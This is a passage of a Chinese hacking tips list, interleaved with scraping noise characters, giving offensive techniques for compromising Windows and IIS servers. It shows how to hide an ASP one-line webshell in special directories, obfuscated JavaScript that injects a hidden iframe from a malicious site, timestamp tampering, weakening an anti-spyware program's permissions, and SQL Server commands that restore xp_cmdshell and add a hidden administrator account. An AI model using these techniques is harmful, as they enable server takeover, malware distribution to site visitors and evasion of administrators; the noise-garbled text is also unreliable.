# }% w; c# k6 G0 d2 E2 m0 t! g2 J, }9 b7 b2 n! p9 n
53、隐藏ASP后门的两种方法
I. O. D- o! |* V1、建立非标准目录:mkdir images..\
# e# R) I* Z, [# U拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
: |- c0 j+ z$ w; X9 \通过web访问ASP木马:http://ip/images../news.asp?action=login
5 j4 w) X |4 ?: A4 I2 e" E$ r% f如何删除非标准目录:rmdir images..\ /s
3 X9 i+ O$ i# K. @" E2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
! _6 l+ }/ i# v8 cmkdir programme.asp
. h* }+ o7 w: w* f2 A$ B! J Q新建1.txt文件内容:<!--#include file=”12.jpg”-->9 e9 [0 M9 T/ ?) x" J# v
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
- z& E6 s$ f7 ~/ u2 F/ Rattrib +H +S programme.asp# a( B/ }6 n! [" [0 |
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
8 A7 Y, q9 {9 c0 |
! Z/ b) Y3 Z: n* S54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。$ c7 U& k1 ^8 ^3 [" g! h1 l' R* z
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。6 ^& W$ \& `! Q# Y( Q( b
z, e2 W" Y0 j9 K+ n55、JS隐蔽挂马: z$ o6 d2 }/ [" D7 A. f( N
1.0 x* k- g" [& C0 x, h7 x) J
var tr4c3="<iframe src=ht";' J8 [8 m- d; k* i P
tr4c3 = tr4c3+"tp:/";# i) H5 }0 n" s; Q
tr4c3 = tr4c3+"/ww";
- O. F( q/ P, Ltr4c3 = tr4c3+"w.tr4";5 h. L# t2 {' H# B7 ?1 \
tr4c3 = tr4c3+"c3.com/inc/m";
" I! t9 B5 i$ U1 _. w2 Jtr4c3 = tr4c3+"m.htm style="display:none"></i";
7 U$ M0 \; [9 n1 p/ jtr4c3 =tr4c3+"frame>'";
9 G6 v7 R5 } }& W. l% C- |, N4 Wdocument.write(tr4c3);) v' I% j. ?4 L' ?( v+ ]
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。# y5 C' H* B2 E
( `- R0 ?- G' c& T2 g) n2.: k1 I% ^! P- x4 H
转换进制,然后用EVAL执行。如
# o- _. W" w$ e( Deval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
' h z. C3 Y. ]; @4 V% j7 \1 j不过这个有点显眼。
% w- L) E7 u7 ] x7 w4 [9 l3.
' r- n6 j% k7 s' u' v) Y4 w4 K- ]document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');2 a4 u; Z% }3 Y% Z9 \
最后一点,别忘了把文件的时间也修改下。% m3 s+ c) l# L4 c2 j8 S
8 N5 T# Z1 f( L6 E7 J% B4 C
56.3389终端入侵常用DOS命令2 t; w$ ~0 }9 E6 `
taskkill taskkill /PID 1248 /t9 G- r) b/ v1 p! Z H5 W% p* o
, ?; d8 b+ f4 h7 r" k+ {, S
tasklist 查进程
2 }5 b8 Z% E s4 Z/ b! v# N
( I7 c; @6 p K7 wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限5 O G2 _9 F" j7 E% u* [2 \3 q
iisreset /reboot
3 q0 n9 ]$ a: o9 L) Mtsshutdn /reboot /delay:1 重起服务器
+ l5 a* n9 q; ~6 } X6 |; x. h; K
* ?6 F5 j& \" |" Jlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
7 B+ v9 o7 i7 ^9 j4 Q6 L+ B/ {, m7 f+ `4 V6 s1 U
query user 查看当前终端用户在线情况& A. Z! V9 \2 o& h
4 [) O9 U, u' k, T7 y# Z
要显示有关所有会话使用的进程的信息,请键入:query process *! N2 _% l5 w5 H* h8 o# W! q
, z$ _- A6 a9 r1 X
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:26 d# d. p7 O% Q P: q4 G
2 M) X I' b4 f要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2& d0 d2 V$ E1 P! {8 ?
3 ~0 V Q1 }. U
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
1 |9 [6 D; j- l2 c3 |% F
- ?( `7 k& D% r% H2 a% }2 u) a命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启8 [0 I. B& X& i
( h! S" r+ u+ g- G. {6 y命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
4 G! n/ y% [# o; m1 v
/ I) d4 m; I6 C4 `$ ^) m命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
! s; @/ N! E6 A- C* x5 J/ A7 U+ i& O* [" @! Q+ ~6 V" f% `, h7 B
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
# O* G# `4 z2 n" j" e3 M6 w+ `& x0 i8 Z# ?
56、在地址栏或按Ctrl+O,输入:
5 A3 ~. Q# O- ~javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;( a7 }/ m1 \5 I
4 d7 D! S' b1 a8 L/ @ @7 f
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
' W, T' R, o( G2 {3 a. _ T8 A; b6 X+ [) {7 v
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,( W( U0 h! T$ B* ?; a
用net localgroup administrators是可以看到管理组下,加了$的用户的。9 {4 U V* b" e6 c0 k- l5 z" W
" [. Y" a# L% `6 @* z
58、 sa弱口令相关命令
+ v. I* K- H4 \% e1 @8 Q
- J T' g% R! m8 O一.更改sa口令方法:
& p, F2 n; V$ ^用sql综合利用工具连接后,执行命令:
# a& M; L) L. T: r |exec sp_password NULL,'20001001','sa'
" b: R0 p$ D8 T2 f z5 w2 V! c2 H(提示:慎用!)" v) Q0 V1 G# w6 j
# Q/ a2 b+ V2 }' P4 V8 C
二.简单修补sa弱口令.
: f& @3 D/ V0 g" j3 u: M
( i1 V; V2 j/ ^5 _方法1:查询分离器连接后执行:
0 f0 n& _0 h* K# s% q, Qif exists (select * from
9 N5 }5 |/ X% D4 Z: N1 ^4 `dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and' s2 Q U: r4 ?( {% o
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
1 Z# F4 k# O* v4 f- v' X* |% e; o! E: E. ] q
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
7 U# h) m$ g# a2 Y( E% n: j/ N0 L' X5 T, G, [/ d
GO
D- Z0 i* R5 P$ G: ?
, o `+ Y9 l* N1 g/ s, L# k! K. r: C3 w然后按F5键命令执行完毕
; D- l( r3 A3 P# y1 j1 w. O$ n+ Y% a2 C H1 ]$ g$ Z: d3 a
方法2:查询分离器连接后
a/ H) f9 e& ]$ A. \1 n5 D第一步执行:use master+ L8 p7 S! b. J& w# I% N
第二步执行:sp_dropextendedproc 'xp_cmdshell'4 e- y# D6 b* ?4 }5 o! P3 i
然后按F5键命令执行完毕. P( M2 O" G: u
6 g+ o' P) f f I
. N9 m& K9 r8 z, M; W三.常见情况恢复执行xp_cmdshell. V U3 Q3 g* U5 T) _) h0 T2 C
, h" M9 V* j9 k. S
- W, Y( e# p# h4 c! c1 未能找到存储过程'master..xpcmdshell'.
# l7 ?( u8 n5 Z& H. X; N6 ` 恢复方法:查询分离器连接后,
, k# ?& s. L7 o& u7 R9 O第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
: M7 y8 d ~' }- h8 |2 ?. \第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'+ F" l! J) s2 L
然后按F5键命令执行完毕* t% t& m# s; i& q& a) b
7 i. f- M# L; {
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
/ P. H. z/ Z4 N6 ~5 {; N: C. A; C恢复方法:查询分离器连接后,
: ?* I* e. G( h1 O/ P! @, M, d第一步执行:sp_dropextendedproc "xp_cmdshell"2 N0 z- V% \0 n
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'* i( I" r5 }/ `" u6 B% v9 t
然后按F5键命令执行完毕
1 {/ l2 D, B+ T% S+ q1 e! J7 |7 E4 {6 U) @
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)% R E% w. D! [; d: D# a
恢复方法:查询分离器连接后,0 n Q+ f5 p0 ?8 v
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
) l% ]- j$ J* M3 {: A第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ; N) l" u& H$ W: ]
然后按F5键命令执行完毕0 @' \3 t' s" J& h7 f. _! I7 M
; g; M5 F9 r7 w/ W2 r) N四.终极方法.
% \0 m6 ]% W1 J" r" M, n如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! `; R+ h x$ t% E
查询分离器连接后,! }5 a# y7 { K8 d+ m
2000servser系统:
/ h% r; h) |2 r, d4 m* Z5 P8 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
0 T+ k' s6 ]1 j' D! q
! \+ P W( H) |, I+ \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'4 i. h2 C Q" F. z5 b$ c
6 ^0 Q% ^8 }* G' s
xp或2003server系统:- ~8 V- v2 P+ b8 `& Z
# E0 ?9 `' U$ D- g+ T8 Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'3 [+ {- T( d1 J4 @0 l; A
0 _9 w4 q+ t: ^1 u0 Z5 M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'. a) I4 s. a4 ]8 H/ J8 k
|